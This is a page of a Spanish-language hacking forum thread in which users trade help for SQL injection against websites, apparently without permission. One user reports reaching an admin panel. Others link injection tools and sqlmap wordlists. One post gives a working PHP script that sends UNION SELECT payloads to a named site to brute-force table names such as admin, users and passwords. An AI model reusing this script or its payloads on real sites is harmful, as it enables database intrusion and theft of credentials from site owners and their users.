elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  (DUDA) Haciendo SQL Injection.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: (DUDA) Haciendo SQL Injection.  (Leído 7,272 veces)
aagos

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #10 en: 30 Julio 2009, 14:33 »

uff muchas gracias soy incapaz de compilar el codigo me da siempre "invalid syntax" voy a probar otros metodos
En línea

Novlucker
Ninja y
Moderador Global
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #11 en: 30 Julio 2009, 15:43 »

No he probado el code, pero veo un raw_input que no funciona en la última versión de python (se ha sustituído), cambialo por input.
Además el print debe de llevar paréntesis, pero bueno, si no tienes idea de esto mejor hacerlo a mano :P

Saludos


Citar
Edite mi post para agregar el otro problema del script, no iba a poner otro porque básicamente no agrega mucho más al tema del SQL injection
« Última modificación: 30 Julio 2009, 16:18 por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
aagos

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #12 en: 30 Julio 2009, 16:14 »

Tampoco amigo Novlucker pero gracias

Una ultima cosa todas las inyecciones las estoy haciendo desde URL modificando algunos parametros con el Tamper Data la base de datos es MySQL 5.0.27 y casi todas las inyecciones me devuelven:

Este fichero XML no parece tener ninguna información de estilo asociada. Se muestra debajo el árbol del documento.
      

<datos>
<resultado>-4</resultado>
</datos>


He llegado asta aqui "/admin/index.php?sc=fli" pero no consigo sacar ningun dato nisiquiera me da ningun error"
Gracias
« Última modificación: 30 Julio 2009, 17:37 por aagos » En línea

MagnoBalt

Desconectado Desconectado

Mensajes: 58


Los Buenos Artitas Copian, los Grandes Roban


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #13 en: 30 Julio 2009, 19:05 »

Hola aagos. Ahi te paso un Script en Perl hecho por Loggin-root. Si estas en Linux no tendras ningun drama con perl pero en widnows tenes que bajarte el interprete.. Busca en Google..
Aqui va el Link.. valga la redundancia esta codeado en perl

http://argentinasec.blogspot.com/2008/07/sql-pw-v07-by-login-root.html


Saludos!!
En línea

aagos

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #14 en: 30 Julio 2009, 22:19 »

Muchas gracias estoy aprendiendo muchisimo
En línea

negretei22

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #15 en: 27 Marzo 2012, 19:26 »

Ya pude obtener la tabla de admin con un codigo SQL para php que hice, ahora los campos lo tengo que hacer de la misma manera??? con algun diccionari ode campos y probando campo por campo? a continuacion les dejo el codigo que hice...


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
</head>

<body>
<?
$pagina="http://www.susitio.com/consejos_detalle.php?advice_id=-2%20UNION/*!%20SELECT*/%201,version%28%29,3,4,5,6,7,8,9,10%20from%20users##";
$tablas=array("admin","tblUsers","tbl_users","tbl_admin","tblAdmin","user","users","username","usernames","usuario","name","names","nombre","nombres","usuarios","member","members","admin_table","miembro","miembros","membername","admins","administrator","administrators","passwd","password","passwords","pass","Pass","user_password","usua_login","user_passwords","user_name","user_names","member_password","mods","mod","moderators","moderator","user_email","user_emails","user_mail","user_mails","mail","emails","email","address","e-mail","emailaddress","correo","correos","phpbb_users","log","logins","login","registers","register","usr","usrs","banners");
echo "Leidas: " .count($tablas) ." palabras<br>";

/*$contenido = file($pagina);

$fp = fopen($contenido,"r") or die("OPEN");
echo $fp;*/
echo "<table><tr><td>Tabla</td><td>Resultado</td></tr>";
for($x=0;$x<count($tablas);$x++){
$pagina="http://www.susitio.com/consejos_detalle.php?advice_id=-2%20UNION/*!%20SELECT*/%201,9999,3,4,5,6,7,8,9,10%20from%20".$tablas[$x]."##";
      $fp = fopen($pagina, 'r');
        $content = '';
        while ($l = fread($fp, 1024)) $content .= $l;
        fclose($fp);
      $encuentra = strpos($content, "doesn't exist");
      if($encuentra)
      echo "<tr><td>".$tablas[$x]."</td><td>NO</td></tr>";
      else
      echo "<tr><td>".$tablas[$x]."</td><td><a href='sacacampos.php?pagina=".$pagina."'>SI</td></tr>";
      
      
}

      
?>
</body>
</html>


Saludos!
« Última modificación: 27 Marzo 2012, 19:31 por negretei22 » En línea

afdlkglfgfdgfhgf

Desconectado Desconectado

Mensajes: 92


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #16 en: 1 Abril 2012, 23:57 »

te aporto con los common-columns , common-table y common-output , que trae por defecto sqlmap para que lo agregues en tu script.

http://www.2shared.com/file/e64Q8TWE/common.html


suerte ;).
En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda con SQL injection « 1 2 »
Nivel Web
Leber 14 9,187 Último mensaje 27 Abril 2008, 15:44
por pedrox@
Duda haciendo un crypter
Programación Visual Basic
aaronduran2 7 1,891 Último mensaje 27 Septiembre 2008, 13:25
por aaronduran2
Una duda de SQL injection
Nivel Web
baZZ 7 4,468 Último mensaje 16 Junio 2009, 00:10
por baZZ
duda con sql injection
Nivel Web
papanata 2 2,015 Último mensaje 3 Septiembre 2009, 09:46
por papanata
Duda haciendo resize a una imagen...
.NET (C#, VB.NET, ASP)
TrashAmbishion 3 1,132 Último mensaje 15 Septiembre 2016, 03:52
por TrashAmbishion
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines